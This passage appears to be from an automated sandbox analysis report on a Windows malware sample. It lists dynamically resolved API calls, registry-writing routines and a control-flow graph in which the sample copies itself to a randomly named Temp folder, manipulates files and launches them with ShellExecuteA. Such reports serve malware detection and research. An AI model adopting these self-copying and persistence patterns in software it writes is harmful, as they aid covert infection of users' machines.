                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AEF6
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF15
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF34
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040AF6D
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040AF99
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AFC1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AFE0
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AFFF
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B01E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B03D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B05C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B07B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B09A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B0B9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B0D8
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B145
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B164
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B183
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1A2
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1C1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1E0
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1FF
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B21E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B267
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B286
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B2A5
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B2C4
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B2E3
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B302
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B321
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B340
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B35F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B37E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B39D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B3BC
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B3DB
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B3FA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B419
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B438
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B457
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B4F4
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040B501
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040B52D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B555
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B574
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B593
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B5B2
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B5D1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B5F0
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B60F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B62E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B64D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B66C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B68B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B6AA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B6C9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B6E8
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B707
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B726
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B745
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B764
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B783
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B7A2
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B7C1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B7E0
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B7FF
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B81E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B83D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B85C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B87B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B89A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B8B9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B8D8
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B8F7
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B916
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BA33
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BA5F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BA87
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BAA6
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BAC5
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BAE4
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB03
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB22
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB41
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB60
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB7F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BB9E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BBBD
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BC46
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BC6E
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BC8D
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BCAC
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BCCB
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BCEA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BD09
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BD3A
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BD66
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BD8A
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BDA9
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BDBE
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BDEA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BE12
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BE31
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BE50
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BE6F
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BE8E
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BEB3
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BEE5
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0040DBD8,00000000), ref: 0040BF08
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0040DBD8,00000000), ref: 0040BF29
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BF3A
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BF66
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0040DBD8,00000000), ref: 0040BF89
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0040DBD8,00000000), ref: 0040BFAA
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0040DBD8,00000000), ref: 0040BFCB
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000), ref: 0040BFE9
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040C009
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$ErrorLast$HandleModule
                                                                                                                                                                                                                                                      • String ID: %\W
                                                                                                                                                                                                                                                      • API String ID: 1445086619-583437078
                                                                                                                                                                                                                                                      • Opcode ID: 559059990ff643097508b6262fd03eeb35fb8387410a21d0e2ae341eea3bf3a4
                                                                                                                                                                                                                                                      • Instruction ID: fe00ecd7844f749915d9149580f3465eef428d98f78ac84402cf4c52ab4222cc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 559059990ff643097508b6262fd03eeb35fb8387410a21d0e2ae341eea3bf3a4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4C2E1F5D40314AFE751AF50AC82EBA36ACD714705F14057FFA04E1192EFB85A848FAA

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,76AF23A0,-000927C0,00000011), ref: 00406190
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004), ref: 004061BA
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004), ref: 004061C8
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?,?,?,00000000,00000004,00000001,00000004), ref: 004061CD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004), ref: 004061D5
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000,?,?,00000000,00000004,00000001,00000004), ref: 00406201
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040622F
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406237
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040623E
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 00406261
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406269
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040628C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406294
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 004062B7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004062BF
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 004062E2
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004062EA
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 0040630D
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406315
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406338
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406340
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 00406363
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 0040636B
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040638E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406396
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 004063B9
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004063C2
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004063CA
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00020006,00000000,?,00000000,?,?,00000000,00000004,00000001,00000004), ref: 004063FD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406405
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 00406428
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?,?,?,?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406431
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406439
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000004,00000001,00000004), ref: 00406465
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040646D
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000004,00000001), ref: 00406490
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?,?,?,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000004,00000001,00000004), ref: 00406499
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,?,?,?,00000000,00000004,00000001,00000004), ref: 004064A1
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000,?,?,00000000,00000004,00000001,00000004), ref: 004064D4
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000091,00000004,?,?,00000000,00000004,00000001,00000004), ref: 004064FB
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?,?,?,00000000,00000004,00000091,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406504
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000091,00000004,?,?,00000000,00000004,00000001,00000004), ref: 0040650C
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,00000000,?,00000000,?,?,00000000,00000004,00000091,00000004,?,?,00000000,00000004,00000001), ref: 0040653F
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000091,00000004), ref: 00406566
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000091,00000004,?,?,00000000), ref: 0040656E
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000091), ref: 00406591
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000091,00000004,?,?,00000000), ref: 00406599
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 004065BC
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004065C4
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 004065E7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 004065EF
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004), ref: 00406612
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 0040661A
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001), ref: 0040663D
                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 00406646
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064,?,?,00000000,00000004,00000001,00000004,?,?,00000000,00000004,00000001,00000004,?,?,00000000), ref: 0040664E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$Value$CloseCreate
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3184397383-0
                                                                                                                                                                                                                                                      • Opcode ID: 93dc55894faf6f814b2ddcf65b5400ae89b31cf79d55cf43324b23fa800c9202
                                                                                                                                                                                                                                                      • Instruction ID: 2bdb2e7eba901f38f779a2f5ef2eb5fdc224b4dd96516dc32fec66fda6d992c8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93dc55894faf6f814b2ddcf65b5400ae89b31cf79d55cf43324b23fa800c9202
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6E11FB6A40218BEE711ABD1DC4AEFF7F7CDB44B05F50007ABA04A1092EA715F949B35

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 671 401f9d-401faf 672 401fb1-401fc3 671->672 673 401fc9-401fcf 672->673 674 401fd1-401fd7 673->674 675 401fe9-401ff4 Sleep 673->675 674->675 676 401fd9-401fdf 674->676 675->673 676->675 677 401fe1-401fe7 676->677 677->675 678 401ff6-402167 call 410c3b * 4 call 406718 lstrcpyA lstrcatA lstrlenA call 413663 lstrcatA call 414883 call 413663 lstrcpyA lstrcatA * 2 SetFileAttributesA call 401ebd 677->678 697 402169-402176 CopyFileA 678->697 698 40217c-40218f call 4094e3 678->698 697->698 701 402251-40226d Sleep call 4012e0 698->701 702 402195-40219b 698->702 708 402273-40227a Sleep 701->708 709 402439-40243f 701->709 702->701 703 4021a1-4021b0 call 401270 702->703 703->701 710 4021b6-40224d wsprintfA lstrcpyA lstrlenA call 4079cf lstrcatA lstrcpyA lstrcatA * 3 DeleteFileA 703->710 708->672 711 402445-40244b 709->711 712 40227f-402285 709->712 710->701 711->672 714 402287-402298 712->714 715 40229a-4022a4 712->715 716 4022ab-4022b0 Sleep 714->716 715->716 718 4022b2-4022b6 716->718 719 4022c0-4022c4 718->719 720 4022b8-4022be 718->720 721 4022c6-4022cc 719->721 722 4022ce-4022d9 Sleep 719->722 720->718 720->719 721->718 721->722 723 4022e9-4022ed 722->723 724 4022db-4022e7 722->724 726 402302-402312 Sleep 723->726 727 4022ef-4022f5 723->727 725 4022fb-402301 call 401511 724->725 725->726 726->709 729 402318-40231e 726->729 727->725 729->709 731 402324-40235c SetFileAttributesA CreateFileA 729->731 731->709 732 402362-402366 731->732 733 402372-40237a 732->733 734 402368-402370 732->734 735 402380-4023ab WriteFile CloseHandle call 401e2a 733->735 736 402450-402457 CloseHandle 733->736 734->733 734->735 735->672 739 4023b1-4023ba 735->739 736->672 739->672 740 4023c0-402438 SetFileAttributesA CopyFileA DeleteFileA call 414883 ShellExecuteA call 4013cb 739->740 740->709
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00401FEE
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\), ref: 004020C4
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004020D2
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000007), ref: 004020DD
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004020FE
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\), ref: 00402129
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00402136
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 00402144
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00402152
                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,?,00000000), ref: 00402176
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004021C6
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 004021DD
